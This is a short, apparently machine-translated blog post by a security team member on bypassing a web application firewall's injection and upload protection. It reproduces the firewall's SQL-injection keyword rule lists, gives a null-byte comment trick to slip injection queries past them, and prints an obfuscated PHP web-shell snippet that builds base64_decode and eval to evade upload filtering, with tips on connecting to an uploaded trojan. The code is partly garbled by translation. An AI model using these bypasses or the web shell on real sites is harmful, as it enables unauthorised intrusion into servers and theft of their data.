Author: conqu3r Pax. Core Mac Team member
Last week, I promised to give a keynote speech. Later I only talked about one usage of burpsuite. Sorry, this week's topic is bypassing. Although there are few people here, the meeting still has to continue. Sharing is still important ....
This time, I am responsible for analyzing the guard system. How can I say this is really powerful in keyword detection? You can add detection rules by yourself or download them from the official website. The analysis is as follows:
1. Rule matching
The defender system matches the three Request Parameters and obtains the get post cookies. The main code is as follows:
The data matched by the GET method is as follows:
* Xp_cmdshell ** and * db_name () *> * 0 ** and * user *> * 0 ** cacls.exe *: ** exec * copy ** insert * exec ** bulk * insert * exec ** select * is_srvrolemember ** use * model ** select * is_member ** declare * sysname ** xp_availablemedia ** xp_dirtree ** xp_terminate_process ** sp_dropextendedproc ** exec * sp_addlogin ** xp_regdeletekey ** exec * xp_regread ** insert * temp * exec ** exec * region ** '* exec * xp_regwrite * '** exec * xp_regread *' ** exec * xp_regdeletevalue * '** declare * @ * char ** exec * xp_regaddmultistring **' ** exec * xp_regdeletekey *'** exec * xp_regenumvalues * '** exec * xp_regread *' ** exec * xp_regremovemultistring ** '** exec * xp_regwrite **' ** declare * @ ** union * select ** select * from ** update * set *
Parameters that match the POST method include:
* Xp_cmdshell ** and * db_name () *> * 0 ** and * user *> * 0 ** cacls.exe *: ** exec * copy ** insert * exec ** bulk * insert * exec ** select * is_srvrolemember ** use * model ** select * is_member ** declare * sysname ** xp_availablemedia ** xp_dirtree ** xp_terminate_process ** sp_dropextendedproc ** exec * sp_addlogin ** xp_regdeletekey ** exec * xp_regread ** insert * temp * exec ** exec * region ** '* exec * xp_regwrite * '** exec * xp_regread *' ** exec * xp_regdeletevalue * '** declare * @ * char ** exec * xp_regaddmultistring **' ** exec * xp_regdeletekey *'** exec * xp_regenumvalues * '** exec * xp_regread *' ** exec * xp_regremovemultistring ** '** exec * xp_regwrite **' ** declare * @ ** union * select ** select * from *
Cookie matching parameters include:
* Xp_cmdshell ** and * db_name () *> * 0 ** and * user *> * 0 ** cacls.exe *: ** exec * copy ** insert * exec ** bulk * insert * exec ** select * is_srvrolemember ** use * model ** select * is_member ** declare * sysname ** xp_availablemedia ** xp_dirtree ** xp_terminate_process ** sp_dropextendedproc ** exec * sp_addlogin ** xp_regdeletekey ** exec * xp_regread ** insert * temp * exec ** exec * region ** '* exec * xp_regwrite * '** exec * xp_regread *' ** exec * xp_regdeletevalue * '** declare * @ * char ** exec * xp_regaddmultistring **' ** exec * xp_regdeletekey *'** exec * xp_regenumvalues * '** exec * xp_regread *' ** exec * xp_regremovemultistring ** '** exec * xp_regwrite **' ** declare * @ ** union * select ** select * from ** update * set *
These basically cover all the injection methods I know and can be said to be perfect.
The test shows that there are still some bypass methods. You can use the program to truncate the % 00 truncation character. Assume that when we pass the parameter, when the guard God truncates the % 00 data, what will happen? There should be no subsequent data. Therefore, we can break the rules for processing.
Test: www.2cto.com
First test in the mysql database: select/* % 00 */* from admin;
If an exclamation point is added to/**/, mysql will not stop receiving parameters, so it cannot be used. We can use the above sentence. If the php version is suitable,/* % 00 */should be passed into the data as a parameter. At this time, the guard system cannot identify the rules.
Of course, during the test, the local environment was a bit problematic. php did not successfully load the mysql module, and it was impossible to test whether the actual php processing was correct. However, through the conjecture of fck uploading, it should be used successfully.
2. Upload rules
The guard system has upload protection and finds that, in fact, in the post Data, key functions can be directly bypassed without affecting the background operation as long as the upload is successful.
Available:
$ Code = 'xxx ';
$ X = str_replace ('F', "", "bfafsfef6f4f_ffdffeffcffoffdffef ");
Preg_replace ('\ 'a \ 'eis', 'E '. 'V '. 'A '. 'l '. '($ x ($ code)', 'A ');
This encryption method can be bypassed.
If you use one sentence, pay attention to the connection method and do not use a kitchen knife.
On the webpage client, or upload the trojan directly.
If the other analysis is not complete, add more content. By the way, sort out the bypass injection method!